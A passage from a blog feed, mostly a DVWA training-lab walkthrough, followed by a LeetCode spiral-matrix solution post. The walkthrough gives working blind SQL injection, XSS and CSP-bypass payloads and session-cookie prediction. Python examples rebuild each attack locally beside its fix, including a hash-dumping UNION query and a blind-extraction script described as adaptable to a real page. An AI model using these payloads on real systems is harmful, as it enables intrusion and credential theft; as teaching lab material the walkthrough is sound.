class="code"><pre><span class="line">1' and ascii(substr(database(),1,1))<122#   (binary search on the ASCII value: about 7 requests per character)</span><br></pre></td></tr></table></figure><p>A time-based approach also works when the page gives no visible difference:</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1' and sleep(3)#   (delay: the quote closes the string literal and sleep() runs)</span><br><span class="line">1 and sleep(3)#    (no delay: the whole thing is still inside the quoted literal)</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' and if(ascii(substr(database(),1,1))<120,sleep(5),1)#</span><br></pre></td></tr></table></figure><p><strong>2.medium</strong></p><p>As in the previous module: capture the request with Burp Suite first, then inject.</p><p><strong>3.high</strong></p><p>Same as the previous module.</p><h3 id="weak-Session-IDs"><a href="#weak-Session-IDs" class="headerlink" title="weak Session IDs"></a>Weak Session IDs</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span> (<span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>])) {</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>] = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>]++;</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>];</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/FeaI6jQ8923fin7.png" alt="image-20220127212611823"></p><p>Each click increments the counter by one and the counter itself is the cookie, so the next session ID is trivially guessable.</p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="title function_ invoke__">time</span>();</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The cookie value is the server's current Unix time, so a session issued at a known moment can be guessed within a window of a few seconds.</p><p><img src="https://s2.loli.net/2022/01/27/zPIAk2Gsb3KRcYg.png" alt="image-20220127213037481"></p><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span> (<span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>])) {</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>] = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>]++;</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>]);</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>, <span class="string">"/vulnerabilities/weak_id/"</span>, <span class="variable">$_SERVER</span>[<span class="string">'HTTP_HOST'</span>], <span class="literal">false</span>, <span class="literal">false</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><p>Hashing the counter with md5 does not help: the md5 of a small integer is reversed by hashing the candidate integers in turn and comparing.</p><h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p><strong>1.low</strong></p><p>No filtering at all, so a plain payload works: <code><script>alert(1)</script></code></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Is there any input?</span></span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">array_key_exists</span>( <span class="string">"name"</span>, <span class="variable">$_GET</span> ) && <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] != <span class="literal">NULL</span> ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$name</span> = <span class="title function_ invoke__">str_replace</span>( <span class="string">'<script>'</span>, <span class="string">''</span>, <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Hello ${name}</pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Double-write bypass (<code>str_replace</code> makes a single pass, so stripping the inner <code><script></code> joins the two outer halves into a new one):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><scrip<script>t>alert(/xss/)</script></span><br></pre></td></tr></table></figure><p>Case bypass (the replacement is case-sensitive):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><Script>alert(/xss/)</script></span><br></pre></td></tr></table></figure><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Is there any input?</span></span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">array_key_exists</span>( <span class="string">"name"</span>, <span class="variable">$_GET</span> ) && <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] != <span class="literal">NULL</span> ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$name</span> = <span class="title function_ invoke__">preg_replace</span>( <span class="string">'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span>, <span class="string">''</span>, <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Hello ${name}</pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The regex now strips any spelling of <code>script</code> case-insensitively, even with other characters in between, so double-writing and case changes no longer work. Use a different tag with an event handler instead:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><img src="" onerror=alert(1)></span><br></pre></td></tr></table></figure><h3 id="CSP绕过"><a href="#CSP绕过" class="headerlink" title="CSP绕过"></a>CSP Bypass</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$headerCSP</span> = <span class="string">"Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;"</span>; <span class="comment">// allows js from self, pastebin.com, hastebin.com, jquery and google analytics.</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="variable">$headerCSP</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># These might work if you can't create your own for some reason</span></span><br><span class="line"><span class="comment"># https://pastebin.com/raw/R570EE00</span></span><br><span class="line"><span class="comment"># https://hastebin.com/raw/ohulaquzex</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">'include'</span>])) {</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">"</span></span><br><span class="line"><span class="string"> <script src='"</span> . <span class="variable">$_POST</span>[<span class="string">'include'</span>] . 
<span class="string">"'></script></span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">'</span></span><br><span class="line"><span class="string"><form name="csp" method="POST"></span></span><br><span class="line"><span class="string"> <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p></span></span><br><span class="line"><span class="string"> <input size="50" type="text" name="include" value="" id="include" /></span></span><br><span class="line"><span class="string"> <input type="submit" value="Include" /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">'</span>;</span><br></pre></td></tr></table></figure><p>The policy allows scripts from a handful of third-party hosts, and the include field drops any URL straight into a <code><script src></code> tag, so an allowlisted host that serves user-uploaded content is enough.</p><p><img src="https://s2.loli.net/2022/02/04/WtwgvO2QVAkaEun.png" alt="image-20220204095601218"></p><p>Open one of the allowed sites (pastebin.com is listed in script-src),</p><p><img src="https://s2.loli.net/2022/02/04/wXNlErgkYCeQOTv.png" alt="image-20220204095512846">paste a piece of JavaScript there and submit the raw URL of the paste in the include field.</p><p><img src="https://s2.loli.net/2022/02/04/1HgryIJEGCTbx2R.png" alt="image-20220204095953637"></p><p><img src="https://s2.loli.net/2022/02/04/U9MhAg6BweJjVNX.png" alt="image-20220204095936972"></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$headerCSP</span> = <span class="string">"Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';"</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="variable">$headerCSP</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Disable XSS protections so that inline alert boxes will work</span></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script></span></span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">'include'</span>])) {</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">"</span></span><br><span class="line"><span class="string"> "</span> . <span class="variable">$_POST</span>[<span class="string">'include'</span>] . 
<span class="string">"</span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">'</span></span><br><span class="line"><span class="string"><form name="csp" method="POST"></span></span><br><span class="line"><span class="string"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p></span></span><br><span class="line"><span class="string"> <input size="50" type="text" name="include" value="" id="include" /></span></span><br><span class="line"><span class="string"> <input type="submit" value="Include" /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">'</span>;</span><br></pre></td></tr></table></figure><p>The policy permits inline scripts that carry the nonce, but the nonce is a fixed string in the source rather than a fresh random value per response, so the attacker simply reuses it (when a nonce is present, browsers ignore the <code>'unsafe-inline'</code> keyword, so the nonce is the way in). Input:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><script nonce=<span class="string">"TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="</span>><span class="title function_">alert</span>(<span class="number">1</span>)</script></span><br></pre></td></tr></table></figure><p>payload: <code><script src="source/jsonp.php?callback=alert('1');"></script></code></p>]]></content>
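<![CDATA[
Added example for the SQL Injection section (my code, not code from the original post or from DVWA): the low-level query shape rebuilt in Python over an in-memory SQLite table that stands in for DVWA's users table, with constructed rows whose hashes are computed locally. The vulnerable lookup concatenates the id into the SQL exactly like the PHP above; the fixed lookup binds it as a parameter. SQLite has no information_schema and does not accept MySQL's # comment, so the payload closes its literal with the same trick as the table_schema='dvwa payload instead of commenting the tail out.

```python
import hashlib
import sqlite3

# Constructed sample rows standing in for DVWA's `users` table; the hashes are
# computed here so the data is self-contained (unsalted MD5, as DVWA stores them).
SEED_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Hack", "Me", "1337", "charley"),
]


def open_db() -> sqlite3.Connection:
    """In-memory stand-in for the dvwa database (assumed to have the same columns as DVWA's users table)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)"
    )
    for uid, first, last, user, clear in SEED_USERS:
        digest = hashlib.md5(clear.encode()).hexdigest()
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)", (uid, first, last, user, digest))
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Mirrors the DVWA low-level code: the id is pasted into the SQL string inside quotes."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_fixed(conn: sqlite3.Connection, user_id: str) -> list:
    """Same query with the id bound as a parameter: the input can never change the SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Two-column UNION, as on the page. No trailing '#': the query's own closing quote
# terminates the '1' literal, the same trick the table_schema='dvwa payload relies on.
UNION_PAYLOAD = "1' union select user, password from users where '1'='1"
TAUTOLOGY_PAYLOAD = "1' or '1'='1"


def dump_credentials(conn: sqlite3.Connection) -> dict:
    """Run the union payload through the vulnerable lookup and keep the (user, hash) rows.
    The legitimate ('admin', 'admin') row comes back too; the hash rows are the 32-hex ones."""
    rows = lookup_vulnerable(conn, UNION_PAYLOAD)
    return {name: value for name, value in rows if len(value) == 32}


if __name__ == "__main__":
    db = open_db()
    print("vulnerable, tautology:", lookup_vulnerable(db, TAUTOLOGY_PAYLOAD))
    print("vulnerable, union    :", dump_credentials(db))
    print("fixed, union         :", lookup_fixed(db, UNION_PAYLOAD))
```

The parameterised version is the whole fix: the driver sends the id as data, so the quote in the payload is just a character in a string that matches no row. In the PHP above the equivalent is mysqli_prepare with bind_param instead of string interpolation.
]]>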
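<![CDATA[
Added example for the Blind SQL Injection section (my code, not from the original post): the boolean-based extraction above turned into a binary search. The target is a constructed stand-in that recognises the two payload shapes used on this page and answers exists/missing against a secret name; swap SimulatedBlindTarget.user_exists for a function that sends the id to the real page and checks for the "exists" message and the extraction code stays the same.

```python
import re
from typing import Callable

# An oracle takes the value of the id parameter and returns True when the page
# says the user ID exists, False when it says MISSING.
Oracle = Callable[[str], bool]

LENGTH_PROBE = "1' and length(database())={n}#"
CHAR_PROBE = "1' and ascii(substr(database(),{pos},1))>{n}#"


class SimulatedBlindTarget:
    """Constructed stand-in for the DVWA blind page (no SQL is run). It recognises the
    two probe shapes above and answers like the page would: True for 'User ID exists',
    False for 'User ID is MISSING' or for any payload it does not understand."""

    _probe = re.compile(
        r"^1' and (?:length\(database\(\)\)=(\d+)"
        r"|ascii\(substr\(database\(\),(\d+),1\)\)>(\d+))#$"
    )

    def __init__(self, secret: str) -> None:
        self.secret = secret
        self.requests = 0

    def user_exists(self, id_value: str) -> bool:
        self.requests += 1
        m = self._probe.match(id_value)
        if m is None:
            return False
        if m.group(1) is not None:
            return len(self.secret) == int(m.group(1))
        pos, n = int(m.group(2)), int(m.group(3))
        return pos <= len(self.secret) and ord(self.secret[pos - 1]) > n


def find_length(oracle: Oracle, max_len: int = 64) -> int:
    """Linear scan, as in the hand-run version on the page (1, 2, 3, ... until 'exists')."""
    for n in range(1, max_len + 1):
        if oracle(LENGTH_PROBE.format(n=n)):
            return n
    raise RuntimeError("no length up to %d matched" % max_len)


def extract_char(oracle: Oracle, pos: int) -> str:
    """Binary search on the ASCII value: at most 7 queries per character instead of up to 127."""
    lo, hi = 0, 127  # invariant: lo < ord(char) <= hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(CHAR_PROBE.format(pos=pos, n=mid)):
            lo = mid
        else:
            hi = mid
    return chr(hi)


def extract_database_name(oracle: Oracle) -> str:
    length = find_length(oracle)
    return "".join(extract_char(oracle, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    target = SimulatedBlindTarget("dvwa")
    print(extract_database_name(target.user_exists), "in", target.requests, "requests")
```

Against a real target the oracle is an HTTP request plus a substring check on the response; for the time-based variant the same functions work unchanged if the oracle instead measures whether the response took longer than the sleep() delay.
]]>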
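<![CDATA[
Added example for the Weak Session IDs section (my code, not DVWA's): the three cookie schemes above reproduced as plain Python functions of the server-side state they depend on, next to the guesses an attacker has to make for each, and the fix. recover_counter undoes the high level's md5 by hashing candidate integers; nothing here contacts a server, and the cookie values are computed locally.

```python
import hashlib
import secrets
import time


def md5_hex(value: int) -> str:
    return hashlib.md5(str(value).encode()).hexdigest()


# The three DVWA schemes, as functions of the state they depend on.
def cookie_low(counter: int) -> str:       # last_session_id++
    return str(counter)


def cookie_medium(now: int) -> str:        # time()
    return str(now)


def cookie_high(counter: int) -> str:      # md5(last_session_id_high++)
    return md5_hex(counter)


def candidates_low(observed: str, lookahead: int = 5) -> list:
    """Low: the next few sessions are simply the next integers."""
    n = int(observed)
    return [cookie_low(n + k) for k in range(1, lookahead + 1)]


def candidates_medium(issued_around: int, spread_seconds: int = 5) -> list:
    """Medium: a cookie issued within +/- spread seconds of a known moment is one of these."""
    return [cookie_medium(t) for t in range(issued_around - spread_seconds, issued_around + spread_seconds + 1)]


def recover_counter(observed_md5: str, max_counter: int = 100_000):
    """High: md5 hides the counter only until someone hashes 1..N and compares."""
    for n in range(1, max_counter + 1):
        if md5_hex(n) == observed_md5:
            return n
    return None


def candidates_high(observed_md5: str, lookahead: int = 5) -> list:
    """High: once the counter is known, the following cookies are md5 of the following integers."""
    n = recover_counter(observed_md5)
    if n is None:
        return []
    return [cookie_high(n + k) for k in range(1, lookahead + 1)]


def cookie_fixed() -> str:
    """What the cookie should be: 128 bits from the OS CSPRNG, unrelated to any counter or clock."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    print("low    ->", candidates_low("7"))
    print("medium ->", candidates_medium(int(time.time()))[:3], "...")
    print("high   ->", candidates_high(cookie_high(42))[:2], "...")
    print("fixed  ->", cookie_fixed())
```

The property that matters is the size of the guess space: a few integers, a few seconds, or a few hundred thousand hashes are all enumerable in seconds, while 128 random bits are not. Hashing a predictable value does not add entropy.
]]>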
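<![CDATA[
Added example for the XSS section (my code, not DVWA's): the medium and high filters re-implemented in Python and run over the payloads from this page, set beside the fix, which is to encode the output for its HTML context instead of blacklisting input (html.escape here, the Python counterpart of PHP's htmlspecialchars). The executes() check is a rough stand-in for a browser and only looks for an unescaped script tag or event handler.

```python
import html
import re


def filter_medium(name: str) -> str:
    """DVWA medium: str_replace('<script>', '', $name). One pass, case-sensitive."""
    return name.replace("<script>", "")


def filter_high(name: str) -> str:
    """DVWA high: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name)."""
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)


def render_blacklisted(name: str, level: str) -> str:
    """The page as the vulnerable code emits it: filtered input dropped into HTML unescaped."""
    filtered = filter_medium(name) if level == "medium" else filter_high(name)
    return f"<pre>Hello {filtered}</pre>"


def render_escaped(name: str) -> str:
    """The fix: encode for the HTML text context at output time, whatever the input is."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def executes(rendered: str) -> bool:
    """Rough browser stand-in: an unescaped <script> tag or an on*= handler inside a tag."""
    return re.search(r"<script\b|<[^>]*\bon\w+=", rendered, re.IGNORECASE) is not None


# The payloads used on this page.
PAYLOADS = {
    "plain": "<script>alert(1)</script>",
    "double-write": "<scrip<script>t>alert(/xss/)</script>",
    "case": "<Script>alert(/xss/)</script>",
    "img-onerror": '<img src="" onerror=alert(1)>',
}


def survivors(level: str) -> list:
    """Names of the payloads that still execute after the given level's filter."""
    return [name for name, p in PAYLOADS.items() if executes(render_blacklisted(p, level))]


if __name__ == "__main__":
    for level in ("medium", "high"):
        print(level, "->", survivors(level))
    print("escaped ->", [n for n, p in PAYLOADS.items() if executes(render_escaped(p))])
```

Note how the high-level regex is greedy: it swallows everything from the first "<" to the last "t" of the final "script", so the case and double-write payloads are reduced to a stray ">", yet any tag that never spells s-c-r-i-p-t passes untouched. Output encoding does not have that gap because it does not try to recognise attacks at all.
]]>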
<categories>
<category> Penetration Testing </category>
</categories>
</entry>
<entry>
<title>Spiral Matrix Output</title>
<link href="/2022/01/18/juzhen/"/>
<url>/2022/01/18/juzhen/</url>
<content type="html"><![CDATA[<p>Problem link: <a href="https://leetcode-cn.com/problems/spiral-matrix/">https://leetcode-cn.com/problems/spiral-matrix/</a></p><p>Problem statement:</p><blockquote><p>Given an m x n matrix (m rows, n columns), return all of its elements in spiral order.</p></blockquote><p>Example:</p><pre><code class="python">Input:  [[1,2,3],[4,5,6],[7,8,9]]
Output: [1,2,3,6,9,8,7,4,5]
</code></pre><img src="https://s2.loli.net/2022/01/18/t1dTKBC3Ao4ZXLj.png" alt="image-20220118182124918" style="zoom:67%;" /><p>Traverse the outermost ring first, then shrink the matrix by one ring and recurse.</p><p>Watch the boundary cases: an empty matrix, a single row, or a single column.</p><p>Recursive method:</p><pre><code class="python">from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])

        newlist = list(matrix[0])  # copy of the top row, so the input is not mutated
        if m > 1:
            # right column, top to bottom (the top-right corner is already taken)
            for i in range(1, m):
                newlist.append(matrix[i][n - 1])
            # bottom row, right to left
            for j in range(n - 2, -1, -1):
                newlist.append(matrix[m - 1][j])
            # left column, bottom to top (rows m-2 .. 1), only when a second column exists
            if n > 1:
                for i in range(m - 2, 0, -1):
                    newlist.append(matrix[i][0])

        # inner matrix: rows 1 .. m-2 with the first and last columns removed
        M = []
        for k in range(1, m - 1):
            M.append(matrix[k][1:-1])

        return newlist + self.spiralOrder(M)
</code></pre><p>A clearer approach:</p><pre><code class="python">from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # one full ring per iteration, as long as the boundaries have not crossed
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1

        # if a single row or a single column remains
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
</code></pre><p>Wall-bump method, i.e. change direction whenever the next step would hit a wall or a visited cell:</p><pre><code class="python">from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        if not matrix:
            return []

        x = y = 0               # current position in the matrix
        res = []                # elements in traversal order
        dx = [0, 1, 0, -1]      # directions: right, down, left, up
        dy = [1, 0, -1, 0]      # note: (x, y) is (row, column), unlike the usual plane coordinates
        di = 0                  # current direction index
        visited = set()         # coordinates already visited
        m, n = len(matrix), len(matrix[0])  # rows and columns of the matrix

        for _ in range(m * n):
            res.append(matrix[x][y])          # record the current element
            visited.add((x, y))               # record its coordinates
            tx, ty = x + dx[di], y + dy[di]   # tentative next step, used to decide whether to turn
            if 0 <= tx < m and 0 <= ty < n and (tx, ty) not in visited:  # in bounds and not yet visited
                x, y = tx, ty
            else:
                di = (di + 1) % 4             # turn: right, down, left, up is one cycle; mod 4 keeps the index in range
                x, y = x + dx[di], y + dy[di]  # next step in the new direction
        return res
</code></pre><pre><code class="python">class Solution(object):
    def spiralOrder(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[int]
        """
        if not matrix or not matrix[0]:
            return []
        M, N = len(matrix), len(matrix[0])
        left, right, up, down = 0, N - 1, 0, M - 1
        res = []
        x, y = 0, 0
        dirs = [(0, 1), (1, 0), (0, -1), (-1, 0)]
        cur_d = 0
        while len(res) != M * N:
            res.append(matrix[x][y])
            if cur_d == 0 and y == right:
                cur_d += 1
                up += 1
            elif cur_d == 1 and x == down:
                cur_d += 1
                right -= 1
            elif cur_d == 2 and y == left:
                cur_d += 1
                down -= 1
            elif cur_d == 3 and x == up:
                cur_d += 1
                left += 1
            cur_d %= 4
            x += dirs[cur_d][0]
            y += dirs[cur_d][1]
        return res
</code></pre><p>The expert's version:</p><pre><code class="python">from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        while matrix:
            # take the head (the first row)
            res += matrix.pop(0)
            # rotate the rest 90 degrees counter-clockwise, ready to be taken next time
            matrix = list(zip(*matrix))[::-1]
        return res
</code></pre>]]></content>
<categories>
<category> Algorithms </category>
</categories>
</entry>
<entry>
<title>2021 in Review</title>
<link href="/2022/01/03/%E5%B9%B4%E6%80%BB%E7%BB%93/"/>
<url>/2022/01/03/%E5%B9%B4%E6%80%BB%E7%BB%93/</url>
